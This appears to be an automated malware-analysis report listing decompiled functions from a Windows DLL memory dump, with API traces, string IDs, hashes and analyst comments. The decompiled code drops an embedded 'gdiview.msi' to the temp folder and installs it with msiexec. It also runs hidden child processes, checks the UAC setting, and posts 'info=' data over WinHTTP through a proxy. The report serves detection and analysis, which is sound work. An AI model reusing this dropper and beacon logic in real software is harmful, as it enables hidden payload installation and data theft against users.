                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                          			E10022760(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                          				char _v8;
                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                          				char _v44;
                                                                                                                                                                          				char _v72;
                                                                                                                                                                          				char _v100;
                                                                                                                                                                          				char _v128;
                                                                                                                                                                          				intOrPtr _v132;
                                                                                                                                                                          				char _v160;
                                                                                                                                                                          				char _v188;
                                                                                                                                                                          				signed int _v192;
                                                                                                                                                                          				intOrPtr _v196;
                                                                                                                                                                          				intOrPtr _v200;
                                                                                                                                                                          				intOrPtr _v204;
                                                                                                                                                                          				intOrPtr _v208;
                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                          				char* _t56;
                                                                                                                                                                          				void* _t75;
                                                                                                                                                                          				void* _t76;
                                                                                                                                                                          				intOrPtr _t119;
                                                                                                                                                                          				void* _t127;
                                                                                                                                                                          
                                                                                                                                                                          				_t127 = __eflags;
                                                                                                                                                                          				_t118 = __esi;
                                                                                                                                                                          				_t117 = __edi;
                                                                                                                                                                          				_t87 = __ebx;
                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                          				_push(E10022C17);
                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                          				 *[fs:0x0] = _t119;
                                                                                                                                                                          				_v192 = 0;
                                                                                                                                                                          				_push(_a12);
                                                                                                                                                                          				_push(0x30);
                                                                                                                                                                          				_push("post_info");
                                                                                                                                                                          				_t56 = PathFindFileNameA(".\\post_info.cpp"); // executed
                                                                                                                                                                          				E1001F1D0(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", _t56); // executed
                                                                                                                                                                          				_v132 = E100223F0(__ebx, __edi, __esi, _t127, _a12);
                                                                                                                                                                          				E100225D0(__ebx, __edi, __esi, _t127,  &_v128);
                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                          				_v196 = E10001160( &_v160, _t127, _a8);
                                                                                                                                                                          				_v200 = _v196;
                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                          				E10001A70( &_v128, _v200);
                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                          				E100011A0( &_v160);
                                                                                                                                                                          				E10001160( &_v100, _t127, "info=");
                                                                                                                                                                          				_v8 = 2;
                                                                                                                                                                          				_v204 = E10001160( &_v188, _t127, _v132);
                                                                                                                                                                          				_v208 = _v204;
                                                                                                                                                                          				_v8 = 3;
                                                                                                                                                                          				E10001A70( &_v100, _v208);
                                                                                                                                                                          				_v8 = 2;
                                                                                                                                                                          				E100011A0( &_v188);
                                                                                                                                                                          				_push(E100011E0( &_v128));
                                                                                                                                                                          				_push(0x3d);
                                                                                                                                                                          				_push("post_info");
                                                                                                                                                                          				E1001F1D0(_t117, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
                                                                                                                                                                          				E10001160( &_v44, _t127, 0x10024ca2);
                                                                                                                                                                          				_v8 = 4;
                                                                                                                                                                          				E10001160( &_v72, _t127, 0x10024ca3);
                                                                                                                                                                          				_v8 = 5;
				_t75 = E10001200( &_v100);
				_t76 = E100011E0( &_v100);
				E10021AF0(__ebx, _t117, __esi, _t127, 0, 0, 0, E100011E0( &_v128), 2, 1, 0, _t76, _t75, 0, 0, 0, 0, 0, 0,  &_v44,  &_v72); // executed -- WinHTTP request wrapper (WinHttpOpen / WinHttpSetOption, see the API list below)
				_push(_v132);
				E1000CA30(_t87, _t117, _t118, _t127); // CRT free (___sbh_free_block / HeapFree per the subcall list)
				E10001110(_a4, _t127,  &_v72);
				_v192 = _v192 | 0x00000001;
				_v8 = 4;
				E100011A0( &_v72);
				_v8 = 2;
				E100011A0( &_v44);
				_v8 = 0;
				E100011A0( &_v100);
				_v8 = 0xffffffff;
				E100011A0( &_v128);
				 *[fs:0x0] = _v16; // unlink this frame's SEH record
				return _a4;
			}

Instruction address gutter for the listing above (one entry per decompiled line): 0x10022760, 0x10022760, 0x10022760, 0x10022760, 0x10022763, 0x10022765, 0x10022770, 0x10022771, 0x1002277e, 0x1002278b, 0x1002278c, 0x1002278e, 0x10022798, 0x100227a4, 0x100227b8, 0x100227bf, 0x100227c7, 0x100227dd, 0x100227e9, 0x100227ef, 0x100227fd, 0x10022802, 0x1002280c, 0x10022819, 0x1002281e, 0x10022831, 0x1002283d, 0x10022843, 0x10022851, 0x10022856, 0x10022860, 0x1002286d, 0x1002286e, 0x10022870, 0x10022886, 0x10022896, 0x1002289b, 0x100228a7, 0x100228ac, 0x100228c7, 0x100228d0, 0x100228eb, 0x100228f6, 0x100228f7, 0x10022906, 0x10022914, 0x1002291a, 0x10022921, 0x10022926, 0x1002292d, 0x10022932, 0x10022939, 0x1002293e, 0x10022948, 0x10022953, 0x1002295d

APIs
• PathFindFileNameA.KERNELBASE(.\post_info.cpp,post_info,00000030,?), ref: 10022798
  • Part of subcall function 1001F1D0: _memset.LIBCMT ref: 1001F1FB
  • Part of subcall function 1001F1D0: OutputDebugStringA.KERNEL32(?,?,?,?,?,100227A9,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F233
  • Part of subcall function 100223F0: _memset.LIBCMT ref: 10022444
  • Part of subcall function 100223F0: _strlen.LIBCMT ref: 10022478
  • Part of subcall function 100223F0: _memset.LIBCMT ref: 100224E6
  • Part of subcall function 100223F0: _strlen.LIBCMT ref: 100224F2
  • Part of subcall function 100225D0: _memset.LIBCMT ref: 10022624
  • Part of subcall function 100225D0: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
  • Part of subcall function 100225D0: _sprintf.LIBCMT ref: 10022666
• PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,0000003D,00000000,?,?,info=,?,?), ref: 1002287A
  • Part of subcall function 10021AF0: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
  • Part of subcall function 10021AF0: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
  • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9

Note: this is the reporting routine from post_info.cpp. The build still carries its __FILE__/__FUNCTION__/__LINE__ logging (PathFindFileNameA on ".\post_info.cpp" together with the "[HIJACK][%s][%s][%d]: url = %s" and "[HIJACK][%s][%s][%d]: data = %s" formats), emitted through OutputDebugStringA, so a debugger or any DBWIN-style listener attached to the process sees the target URL and the "info=" body in clear. The request goes out over WinHTTP with the user agent "A WinHTTP Example Program/1.0", the string used verbatim in Microsoft's WinHTTP documentation samples and therefore a cheap network indicator. WinHttpSetOption option 0x26 (38) is WINHTTP_OPTION_PROXY and the 12-byte length matches WINHTTP_PROXY_INFO on x86; if the 00000003 shown in the buffer slot is that structure's dwAccessType, it is WINHTTP_ACCESS_TYPE_NAMED_PROXY, i.e. the request is routed through an explicitly configured proxy rather than the session default. GetLocalTime followed by _sprintf in 100225D0 suggests a timestamp is formatted into the posted data.

Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset$FileFindHttpNamePath_strlen$DebugErrorFreeHeapLastLocalOpenOptionOutputStringTime___sbh_find_block___sbh_free_block_sprintf
• String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
• API String ID: 728604215-152146038
• Opcode ID: 769911f16bfbc381c0fecbc11744f148040757df45974d0afd696e4a0af9f17f
• Instruction ID: 42968dd6338b29c892dd1ec079196b21a890ae0ab2ff2efbcc3c73078d1eef52
• Opcode Fuzzy Hash: 769911f16bfbc381c0fecbc11744f148040757df45974d0afd696e4a0af9f17f
• Instruction Fuzzy Hash: 38515F75C01258EBEB14DB94DC52FDEBB74EF18380F504198F60A67286DB702B04CB52
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E1001FC70(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;
				void* _t22;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF20(__edi,  &_v1291, 0, 0x103); // _memset: clear the 0x104-byte path buffer
				_v1028 = 0;
				E1000CF20(_t29,  &_v1027, 0, 0x3ff); // _memset: clear the 0x400-byte command-line buffer
				GetTempPathA(0x104,  &_v1292); // path = %TEMP%
				E1000CD96( &_v1292,  &_v1292, 0x104, "gdiview.msi"); // _strcat_s: path = %TEMP%\gdiview.msi
				E1000CC93(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292); // _sprintf: build the installer command line
				E1001FC10( &_v1292, 0x10026888, 0x39e00); // executed -- CreateFileA/WriteFile/CloseHandle: write the 0x39e00 bytes embedded at 0x10026888 to that path
				_t21 = PathFileExistsA( &_v1292); // executed
				_t38 = _t21;
				if(_t21 != 0) {
					_t22 = E1001A1D0(_t38,  &_v1028); // executed -- CreateProcessA wrapper: run msiexec.exe on the dropped package
					return _t22;
				}
				return _t21;
			}

Instruction address gutter for the listing above (one entry per decompiled line): 0x1001fc70, 0x1001fc79, 0x1001fc8e, 0x1001fc96, 0x1001fcab, 0x1001fcbf, 0x1001fcd6, 0x1001fcf1, 0x1001fd0a, 0x1001fd19, 0x1001fd1f, 0x1001fd21, 0x1001fd2a, 0x00000000, 0x1001fd2f, 0x1001fd35

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FC8E
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FCAB
                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FCBF
                                                                                                                                                                          • _strcat_s.LIBCMT ref: 1001FCD6
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001FCF1
                                                                                                                                                                            • Part of subcall function 1001FC10: CreateFileA.KERNELBASE(10026888,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC33
                                                                                                                                                                            • Part of subcall function 1001FC10: WriteFile.KERNELBASE(00039E00,00000000,00000000,10026888,00000000), ref: 1001FC4E
                                                                                                                                                                            • Part of subcall function 1001FC10: CloseHandle.KERNEL32(00039E00), ref: 1001FC63
                                                                                                                                                                          • PathFileExistsA.KERNELBASE(00000000), ref: 1001FD19
                                                                                                                                                                            • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                                            • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                                            • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                                            • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                                            • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                                          • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                                          • API String ID: 1459467440-729886463
                                                                                                                                                                          • Opcode ID: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                                          • Instruction ID: fc1d18d4907088cb0004c85748b024e0f714aa859ea981698376c8e2dc0c21e3
                                                                                                                                                                          • Opcode Fuzzy Hash: cfe5d9c9d1d3e7bc7d2d8329fe4a4c5a513885faf241df6a6b0121b9ea01f52c
                                                                                                                                                                          • Instruction Fuzzy Hash: 431170BAD402186AE750D760EC46FEE7328DB54701F4444A4BB48A5085EBB1A7988F92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                          			E10020575(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                          				int _t20;
                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                          				void* _t33;
                                                                                                                                                                          				void* _t35;
                                                                                                                                                                          				void* _t47;
                                                                                                                                                                          				void* _t49;
                                                                                                                                                                          				intOrPtr _t51;
                                                                                                                                                                          				void* _t52;
                                                                                                                                                                          				intOrPtr _t53;
                                                                                                                                                                          				intOrPtr _t55;
                                                                                                                                                                          				intOrPtr _t57;
                                                                                                                                                                          
                                                                                                                                                                          				_t62 = __eflags;
                                                                                                                                                                          				_t45 = __esi;
                                                                                                                                                                          				_t44 = __edi;
                                                                                                                                                                          				_t36 = __ebx;
                                                                                                                                                                          				E1001FDB0(); // executed
                                                                                                                                                                          				E1001FF90(__ebx, __edi, __esi, __eflags, "install", "installp2", "-0.3", "45.0.0", "exe"); // executed
                                                                                                                                                                          				_t51 = _t49 + 0x14 - 0x1c;
                                                                                                                                                                          				_t37 = _t51;
                                                                                                                                                                          				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
                                                                                                                                                                          				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
                                                                                                                                                                          				E10020180(__ebx, __edi, __esi, _t62); // executed
                                                                                                                                                                          				_t52 = _t51 + 0x1c;
                                                                                                                                                                          				_t20 = PathFileExistsA("C:\\hijack"); // executed
                                                                                                                                                                          				if(_t20 != 0) {
                                                                                                                                                                          					L7:
                                                                                                                                                                          					_t53 = _t52 - 0x1c;
                                                                                                                                                                          					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
                                                                                                                                                                          					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
                                                                                                                                                                          					E10020180(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                                          					_t55 = _t53 + 0x1c - 0x1c;
                                                                                                                                                                          					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
                                                                                                                                                                          					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "installp2");
                                                                                                                                                                          					E1001FEA0(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                                          					_t57 = _t55 + 0x1c - 0x1c;
                                                                                                                                                                          					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
                                                                                                                                                                          					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "installp2");
                                                                                                                                                                          					E1001FDC0(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                                          					_t59 = _t57 + 0x1c - 0x1c;
                                                                                                                                                                          					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
                                                                                                                                                                          					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
                                                                                                                                                                          					E10020180(_t36, _t44, _t45, __eflags); // executed
                                                                                                                                                                          				} else {
                                                                                                                                                                          					E1001A0A0(); // executed
                                                                                                                                                                          					_t33 = E1001A0B0(_t37); // executed
                                                                                                                                                                          					if(_t33 == 0 || E10019D10() != 0) {
                                                                                                                                                                          					} else {
                                                                                                                                                                          						_t35 = E1001FA30(_t36, _t44, _t45, __eflags, 0x3e8, 0); // executed
                                                                                                                                                                          						_t52 = _t52 + 8;
                                                                                                                                                                          						__eflags = _t35;
                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                          							goto L7;
                                                                                                                                                                          						} else {
                                                                                                                                                                          						}
                                                                                                                                                                          					}
                                                                                                                                                                          				}
                                                                                                                                                                          				E1001A260(); // executed
                                                                                                                                                                          				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
                                                                                                                                                                          				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
                                                                                                                                                                          				E100011A0(_t47 - 0x28);
                                                                                                                                                                          				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
                                                                                                                                                                          				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                                                                                                                                                                          				return _t31;
                                                                                                                                                                          			}

                                                                                                                                                                          APIs
                                                                                                                                                                          • PathFileExistsA.KERNELBASE(C:\hijack), ref: 10020692
                                                                                                                                                                            • Part of subcall function 10019D10: GetSystemDefaultLCID.KERNEL32 ref: 10019D1D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DefaultExistsFilePathSystem
                                                                                                                                                                          • String ID: -0.3$45.0.0$C:\hijack$exe$install$installp2$status=main_start
                                                                                                                                                                          • API String ID: 482051434-254430877
                                                                                                                                                                          • Opcode ID: 893b3059632501a4e8b008769275d464316cd47a877e48c170e5124c6c6ed629
                                                                                                                                                                          • Instruction ID: 180e9a89bd69158387d9cbec8d9a940dcb427d9c64843ce9222d1c9730998d87
                                                                                                                                                                          • Opcode Fuzzy Hash: 893b3059632501a4e8b008769275d464316cd47a877e48c170e5124c6c6ed629
                                                                                                                                                                          • Instruction Fuzzy Hash: AE01D178E483185FD750EFA49C4A7DE77B2DF50254F9001A8FD08A6243EB31B6908EA2
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 100%
E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
	struct _OSVERSIONINFOW _v284;
	char _v547;
	char _v548;
	char _v819;
	char _v820;
	char _v824;
	void* _t31;
	void* _t38;
	void* _t41;
	void* _t49;
	void* _t50;
	void* _t51;
	void* _t53;
	void* _t57;
	void* _t69;
	void* _t70;
	void* _t71;
	void* _t74;
	void* _t75;
	void* _t77;

	_t69 = __esi;
	_t68 = __edi;
	_t57 = __ebx;
	if(_a4 == 0) {
		return _t31;
	}
	_v820 = 0;
	E1000CF20(__edi,  &_v819, 0, 0x103);
	_v548 = 0;
	_t58 =  &_v547;
	E1000CF20(_t68,  &_v547, 0, 0x103);
	_t65 =  &(_v284.dwMajorVersion);
	E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
	_t74 = _t71 + 0x24;
	_v284.dwOSVersionInfoSize = 0x114;
	GetVersionExW( &_v284);
	if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D240() == 0) {
		_t38 = E1001D7E0(_t68,  &_v548); // executed
		_t75 = _t74 + 4;
		__eflags = _t38;
		if(_t38 != 0) {
			L11:
			E1001D2D0(_t58,  &_v548);
			_t65 =  &_v820;
			_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
			_t77 = _t75 + 0x10;
			__eflags = _t41;
			if(_t41 >= 0) {
				_t65 = 0x104 - _v824;
				__eflags = 0x104;
				E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
				_t77 = _t77 + 0xc;
			}
			goto L13;
		}
		_t49 = E1001D560(_t68,  &_v548); // executed
		_t75 = _t75 + 4;
		__eflags = _t49;
		if(_t49 != 0) {
			goto L11;
		}
		_t58 =  &_v548;
		_t50 = E1001DA70(_t68,  &_v548); // executed
		_t75 = _t75 + 4;
		__eflags = _t50;
		if(_t50 != 0) {
			goto L11;
		}
		_t65 =  &_v548;
		_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
		_t77 = _t75 + 4;
		__eflags = _t51;
		if(_t51 == 0) {
			goto L13;
		}
		goto L11;
	} else {
		_t53 = E1001DA70(_t68,  &_v548);
		_t77 = _t74 + 4;
		_t84 = _t53;
		if(_t53 != 0) {
			_t65 =  &_v548;
			E1001D2D0( &_v548,  &_v548);
			E1001D320(_t84,  &_v820,  &_v548);
			_t77 = _t77 + 0xc;
		}
		L13:
		if(_v820 == 0) {
			_t65 =  &_v820;
			E1001CFA0("Mid2Failed", 0x104,  &_v820);
			_t77 = _t77 + 0xc;
		}
		return E1000D8A3(_t65, _a4, 0x104,  &_v820);
	}
}

APIs
• _memset.LIBCMT ref: 1001DC28
• _memset.LIBCMT ref: 1001DC45
• _memset.LIBCMT ref: 1001DC5B
• GetVersionExW.KERNEL32(00000114), ref: 1001DC74
• _strcpy_s.LIBCMT ref: 1001DDA9
  • Part of subcall function 1001D240: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
  • Part of subcall function 1001D240: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
  • Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
  • Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
  • Part of subcall function 1001DA70: CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
  • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
  • Part of subcall function 1001DA70: DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DB50
  • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
  • Part of subcall function 1001DA70: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DBB4
  • Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE
Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset$Close$ChangeControlCreateDeviceFileFindNotificationOpenQueryValueVersion_strcpy_s_strlenwsprintf
• String ID: Mid2Failed
• API String ID: 3782552391-1001836097
• Opcode ID: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
• Instruction ID: aa707a60008127caf2ce8d05e14bba9426138a7f06fddb79af8b759b423a3348
• Opcode Fuzzy Hash: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
• Instruction Fuzzy Hash: 224184B5C0021967EB14F7A0AC86FEA737DEB14744F4404A9EA0899142F771FBC8CB92
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%
E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
	char _v8;
	intOrPtr _v16;
	char _v44;
	char _v311;
	char _v312;
	char _v575;
	char _v576;
	void* _t30;
	void* _t41;
	intOrPtr _t43;
	void* _t50;

	_t50 = __eflags;                                          // 0x1001fea0
	_t41 = __edi;                                             // 0x1001fea0
	_push(0xffffffff);                                        // 0x1001fea3  SEH frame setup
	_push(E10022AF1);                                         // 0x1001fea5
	_push( *[fs:0x0]);                                        // 0x1001feb0
	 *[fs:0x0] = _t43;                                        // 0x1001feb1
	_v8 = 0;                                                  // 0x1001febe
	_v576 = 0;                                                // 0x1001fec5
	E1000CF20(__edi,  &_v575, 0, 0x103);                      // 0x1001feda  _memset: zero the 0x104-byte temp-path buffer
	_v312 = 0;                                                // 0x1001fee2
	E1000CF20(_t41,  &_v311, 0, 0x103);                       // 0x1001fef7  _memset: zero the command-line buffer
	E1001A600(__ebx, _t41, __esi, _t50,  &_v44); // executed  // 0x1001ff03  subcall: GetModuleFileNameA + _sprintf fill _v44
	GetTempPathA(0x104,  &_v576);                             // 0x1001ff17  %TEMP% path into _v576
	_push(E100011E0( &_a4));                                  // 0x1001ff25  4th %s: the _a4 argument
	_push("0011");                                            // 0x1001ff26  3rd %s: literal "0011"
	_push(E100011E0( &_v44));                                 // 0x1001ff33  2nd %s: string produced by E1001A600
	E1000CC93(_t41,  &_v312, "%s%s %s %s",  &_v576);          // 0x1001ff47  _sprintf: "<temp path><_v44> 0011 <_a4>"
	E1001A1D0(_t50,  &_v312); // executed                     // 0x1001ff56  runs that command line via CreateProcessA
	E100011A0( &_v44);                                        // 0x1001ff61
	_v8 = 0xffffffff;                                         // 0x1001ff66
	_t30 = E100011A0( &_a4);                                  // 0x1001ff70
	 *[fs:0x0] = _v16;                                        // 0x1001ff78  SEH frame teardown
	return _t30;                                              // 0x1001ff82
}

APIs
• _memset.LIBCMT ref: 1001FEDA
• _memset.LIBCMT ref: 1001FEF7
  • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
  • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
  • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
• GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
• _sprintf.LIBCMT ref: 1001FF47
  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
  • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
• String ID: %s%s %s %s$0011
• API String ID: 3552933064-2132516514
• Opcode ID: 1d9b09cfca39a609c0d1c4b04c45a75235e20a1c535110d9b18c7a09704cf595
• Instruction ID: 67bf52551a5dba2018d4aeac715347b552078b1bc39281a068a263b1fa8e7f35
• Opcode Fuzzy Hash: 1d9b09cfca39a609c0d1c4b04c45a75235e20a1c535110d9b18c7a09704cf595
• Instruction Fuzzy Hash: D411B6B6C00248ABE714EB90DC96FDD777CEB14750F4041A4FA19661C1EB747B48CBA1
Uniqueness

Uniqueness Score: -1.00%
C-Code - Quality: 100%
E1001A1D0(void* __eflags, CHAR* _a4) {
	struct _PROCESS_INFORMATION _v20;
	int _v24;
	struct _STARTUPINFOA _v100;
	int _t18;
	void* _t27;

	_v24 = 0;                                                    // 0x1001a1d6  return value: 0 = launch failed
	E1000CF20(_t27,  &_v100, 0, 0x44);                           // 0x1001a1e5  _memset(&si, 0, sizeof(STARTUPINFOA))
	_v100.cb = 0x44;                                             // 0x1001a1ed
	_v100.dwFlags = 1;                                           // 0x1001a1f4  STARTF_USESHOWWINDOW
	_v100.wShowWindow = 0;                                       // 0x1001a1fb  SW_HIDE: the child process gets no visible window
	E1000CF20(_t27,  &_v20, 0, 0x10);                            // 0x1001a209  _memset(&pi, 0, sizeof(PROCESS_INFORMATION))
	_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20); // executed  // 0x1001a22b  _a4 is the full command line
	if(_t18 != 0) {                                              // 0x1001a233
		CloseHandle(_v20.hThread);                               // 0x1001a239
		CloseHandle(_v20.hProcess);                              // 0x1001a243  first member of PROCESS_INFORMATION
		_v24 = 1;                                                // 0x1001a249
	}                                                            // 0x1001a249
	return _v24;                                                 // 0x1001a256
}

APIs
• _memset.LIBCMT ref: 1001A1E5
• _memset.LIBCMT ref: 1001A209
